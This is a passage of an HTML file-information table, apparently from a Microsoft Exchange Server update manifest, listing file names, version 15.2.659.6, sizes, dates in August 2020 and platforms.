applicable</td></tr><tr><td>Interop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.659.6</td><td>20,360</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Interop.certenroll.dll</td><td>15.2.659.6</td><td>142,712</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Interop.licenseinfointerface.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Interop.netfw.dll</td><td>15.2.659.6</td><td>34,176</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Interop.plalibrary.dll</td><td>15.2.659.6</td><td>72,576</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.659.6</td><td>27,008</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Interop.taskscheduler.dll</td><td>15.2.659.6</td><td>46,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Interop.wuapilib.dll</td><td>15.2.659.6</td><td>60,800</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Interop.xenroll.dll</td><td>15.2.659.6</td><td>39,808</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Kerbauth.dll</td><td>15.2.659.6</td><td>62,848</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Licenseinfointerface.dll</td><td>15.2.659.6</td><td>643,464</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Lpversioning.xml</td><td>Not applicable</td><td>19,654</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Mailboxdatabasereseedusingspares.ps1</td><td>Not applicable</td><td>31,904</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Managedavailabilitycrimsonmsg.dll</td><td>15.2.659.6</td><td>138,624</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Managedstorediagnosticfunctions.ps1</td><td>Not applicable</td><td>126,237</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Managescheduledtask.ps1</td><td>Not applicable</td><td>36,356</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Manage_metacachedatabase.ps1</td><td>Not applicable</td><td>51,087</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Mce.dll</td><td>15.2.659.6</td><td>1,693,576</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Measure_storeusagestatistics.ps1</td><td>Not applicable</td><td>29,503</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Merge_publicfoldermailbox.ps1</td><td>Not applicable</td><td>22,623</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.database.isam.dll</td><td>15.2.659.6</td><td>127,880</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.dkm.proxy.dll</td><td>15.2.659.6</td><td>25,992</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.activemonitoringvariantconfig.dll</td><td>15.2.659.6</td><td>68,488</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.eventlog.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.addressbook.service.dll</td><td>15.2.659.6</td><td>233,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.addressbook.service.eventlog.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.airsyncmsg.dll</td><td>15.2.659.6</td><td>43,384</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.comon.dll</td><td>15.2.659.6</td><td>1,776,000</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.airsync.dll1</td><td>15.2.659.6</td><td>505,216</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.airsynchandler.dll</td><td>15.2.659.6</td><td>76,168</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.anchorservice.dll</td><td>15.2.659.6</td><td>135,552</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.antispam.eventlog.dll</td><td>15.2.659.6</td><td>23,432</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdate.eventlog.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdatesvc.exe</td><td>15.2.659.6</td><td>27,016</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.approval.applications.dll</td><td>15.2.659.6</td><td>53,632</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.dll</td><td>15.2.659.6</td><td>925,056</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.eventlog.dll</td><td>15.2.659.6</td><td>25,984</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.assistants.interfaces.dll</td><td>15.2.659.6</td><td>43,400</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.audit.azureclient.dll</td><td>15.2.659.6</td><td>15,240</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditlogsearch.eventlog.dll</td><td>15.2.659.6</td><td>14,720</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearchservicelet.dll</td><td>15.2.659.6</td><td>70,528</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.dll</td><td>15.2.659.6</td><td>94,592</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.eventlog.dll</td><td>15.2.659.6</td><td>13,192</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadmin.eventlog.dll</td><td>15.2.659.6</td><td>15,744</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadminservicelet.dll</td><td>15.2.659.6</td><td>36,736</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.authservicehostservicelet.dll</td><td>15.2.659.6</td><td>15,744</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.configuration.dll</td><td>15.2.659.6</td><td>79,744</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.dll</td><td>15.2.659.6</td><td>396,152</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.eventlogs.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.autodiscoverv2.dll</td><td>15.2.659.6</td><td>57,216</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.bandwidthmonitorservicelet.dll</td><td>15.2.659.6</td><td>14,720</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.batchservice.dll</td><td>15.2.659.6</td><td>35,712</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.cabutility.dll</td><td>15.2.659.6</td><td>276,352</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeployment.eventlog.dll</td><td>15.2.659.6</td><td>16,256</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeploymentservicelet.dll</td><td>15.2.659.6</td><td>25,984</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.certificatenotification.eventlog.dll</td><td>15.2.659.6</td><td>13,696</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatenotificationservicelet.dll</td><td>15.2.659.6</td><td>23,424</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.common.dll</td><td>15.2.659.6</td><td>377,728</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.eventlogs.dll</td><td>15.2.659.6</td><td>83,848</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.clients.owa.dll</td><td>15.2.659.6</td><td>2,971,016</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.server.dll</td><td>15.2.659.6</td><td>5,029,760</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.servervariantconfiguration.dll</td><td>15.2.659.6</td><td>893,824</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.security.dll</td><td>15.2.659.6</td><td>413,568</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.strings.dll</td><td>15.2.659.6</td><td>924,544</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.bandwidthmonitor.dll</td><td>15.2.659.6</td><td>31,624</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.dll</td><td>15.2.659.6</td><td>52,096</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.extensions.dll</td><td>15.2.659.6</td><td>21,888</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.diskmonitor.dll</td><td>15.2.659.6</td><td>33,664</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replay.dll</td><td>15.2.659.6</td><td>3,515,264</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replicaseeder.dll</td><td>15.2.659.6</td><td>108,416</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.replicavsswriter.dll</td><td>15.2.659.6</td><td>288,640</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.shared.dll</td><td>15.2.659.6</td><td>625,536</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.agentconfig.transport.dll</td><td>15.2.659.6</td><td>86,408</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.componentconfig.transport.dll</td><td>15.2.659.6</td><td>1,831,296</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.adagentservicevariantconfig.dll</td><td>15.2.659.6</td><td>31,624</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.directoryvariantconfig.dll</td><td>15.2.659.6</td><td>465,800</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.domtvariantconfig.dll</td><td>15.2.659.6</td><td>25,480</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.ismemberofresolverconfig.dll</td><td>15.2.659.6</td><td>38,272</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.tenantrelocationvariantconfig.dll</td><td>15.2.659.6</td><td>102,792</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.topologyservicevariantconfig.dll</td><td>15.2.659.6</td><td>48,520</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.diskmanagement.dll</td><td>15.2.659.6</td><td>67,464</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.dll</td><td>15.2.659.6</td><td>172,928</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.encryption.variantconfig.dll</td><td>15.2.659.6</td><td>113,544</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.il.dll</td><td>15.2.659.6</td><td>13,696</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.inference.dll</td><td>15.2.659.6</td><td>130,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.optics.dll</td><td>15.2.659.6</td><td>63,880</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.processmanagermsg.dll</td><td>15.2.659.6</td><td>19,848</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.protocols.popimap.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.dll</td><td>15.2.659.6</td><td>108,928</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.eventlog.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.smtp.dll</td><td>15.2.659.6</td><td>51,584</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll</td><td>15.2.659.6</td><td>36,744</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.azure.dll</td><td>15.2.659.6</td><td>27,520</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.monitoringconfig.dll</td><td>15.2.659.6</td><td>1,042,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.commonmsg.dll</td><td>15.2.659.6</td><td>29,056</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditlogpumper.messages.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.core.dll</td><td>15.2.659.6</td><td>181,120</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.messages.dll</td><td>15.2.659.6</td><td>30,088</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.common.dll</td><td>15.2.659.6</td><td>22,408</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.crimsonevents.dll</td><td>15.2.659.6</td><td>85,896</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.dll</td><td>15.2.659.6</td><td>41,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.recordreview.dll</td><td>15.2.659.6</td><td>37,256</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.supervision.dll</td><td>15.2.659.6</td><td>50,568</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskcreator.dll</td><td>15.2.659.6</td><td>33,160</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributioncommon.dll</td><td>15.2.659.6</td><td>1,100,152</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributionfabric.dll</td><td>15.2.659.6</td><td>206,728</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskplugins.dll</td><td>15.2.659.6</td><td>210,816</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.compression.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.dll</td><td>15.2.659.6</td><td>37,768</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.core.dll</td><td>15.2.659.6</td><td>145,792</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.core.eventlog.dll</td><td>15.2.659.6</td><td>14,200</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.dll</td><td>15.2.659.6</td><td>53,128</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.eventlog.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.dll</td><td>15.2.659.6</td><td>23,424</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.eventlog.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.failfast.dll</td><td>15.2.659.6</td><td>54,664</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.failfast.eventlog.dll</td><td>15.2.659.6</td><td>13,704</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.dll</td><td>15.2.659.6</td><td>1,846,144</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.eventlog.dll</td><td>15.2.659.6</td><td>30,080</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.dll</td><td>15.2.659.6</td><td>68,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.eventlog.dll</td><td>15.2.659.6</td><td>15,240</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll</td><td>15.2.659.6</td><td>13,176</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.connectiondatacollector.dll</td><td>15.2.659.6</td><td>25,976</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.common.dll</td><td>15.2.659.6</td><td>169,856</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.eas.dll</td><td>15.2.659.6</td><td>330,112</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.imap.dll</td><td>15.2.659.6</td><td>173,952</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.pop.dll</td><td>15.2.659.6</td><td>71,040</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.contentfilter.wrapper.exe</td><td>15.2.659.6</td><td>203,648</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.context.client.dll</td><td>15.2.659.6</td><td>27,008</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.configuration.dll</td><td>15.2.659.6</td><td>51,584</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.core.dll</td><td>15.2.659.6</td><td>51,072</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.datamodel.dll</td><td>15.2.659.6</td><td>46,976</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.strings.dll</td><td>15.2.659.6</td><td>1,093,512</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.timezone.dll</td><td>15.2.659.6</td><td>57,216</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.deep.dll</td><td>15.2.659.6</td><td>326,528</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>15.2.659.6</td><td>3,352,960</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.eventlog.dll</td><td>15.2.659.6</td><td>35,712</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.monitoring.ifx.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.connectors.dll</td><td>15.2.659.6</td><td>165,256</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.consumermailboxprovisioning.dll</td><td>15.2.659.6</td><td>619,400</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>15.2.659.6</td><td>7,791,488</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>15.2.659.6</td><td>80,264</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>15.2.659.6</td><td>1,789,312</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.groupmailboxaccesslayer.dll</td><td>15.2.659.6</td><td>1,626,496</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.ha.dll</td><td>15.2.659.6</td><td>375,168</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.imageanalysis.dll</td><td>15.2.659.6</td><td>105,856</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxfeatures.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxloadbalance.dll</td><td>15.2.659.6</td><td>224,648</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>15.2.659.6</td><td>186,760</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.contracts.dll</td><td>15.2.659.6</td><td>39,816</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.dll</td><td>15.2.659.6</td><td>119,168</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.msosyncxsd.dll</td><td>15.2.659.6</td><td>968,072</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.notification.dll</td><td>15.2.659.6</td><td>141,192</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.personaldataplatform.dll</td><td>15.2.659.6</td><td>769,416</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>15.2.659.6</td><td>139,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.provisioning.dll</td><td>15.2.659.6</td><td>56,704</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.rightsmanagement.dll</td><td>15.2.659.6</td><td>452,992</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.scheduledtimers.dll</td><td>15.2.659.6</td><td>32,648</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>15.2.659.6</td><td>256,904</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>15.2.659.6</td><td>11,814,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>15.2.659.6</td><td>37,752</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.storageconfigurationresources.dll</td><td>15.2.659.6</td><td>655,752</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storeobjects.dll</td><td>15.2.659.6</td><td>175,488</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>15.2.659.6</td><td>36,224</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>15.2.659.6</td><td>14,208</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll</td><td>15.2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>15.2.659.6</td><td>72,584</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.delivery.eventlog.dll</td><td>15.2.659.6</td><td>13,192</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.certificatelogger.dll</td><td>15.2.659.6</td><td>22,920</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>15.2.659.6</td><td>2,212,736</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll.deploy</td><td>15.2.659.6</td><td>2,212,736</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.diagnostics.performancelogger.dll</td><td>15.2.659.6</td><td>23,936</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.common.dll</td><td>15.2.659.6</td><td>546,688</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.eventlog.dll</td><td>15.2.659.6</td><td>215,432</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exchangejobs.dll</td><td>15.2.659.6</td><td>194,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exe</td><td>15.2.659.6</td><td>146,312</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.fuseboxperfcounters.dll</td><td>15.2.659.6</td><td>27,512</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregation.eventlog.dll</td><td>15.2.659.6</td><td>13,704</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregationservicelet.dll</td><td>15.2.659.6</td><td>49,536</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.eventlog.dll</td><td>15.2.659.6</td><td>28,024</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.exe</td><td>15.2.659.6</td><td>208,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.disklocker.events.dll</td><td>15.2.659.6</td><td>88,968</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.disklocker.interop.dll</td><td>15.2.659.6</td><td>32,64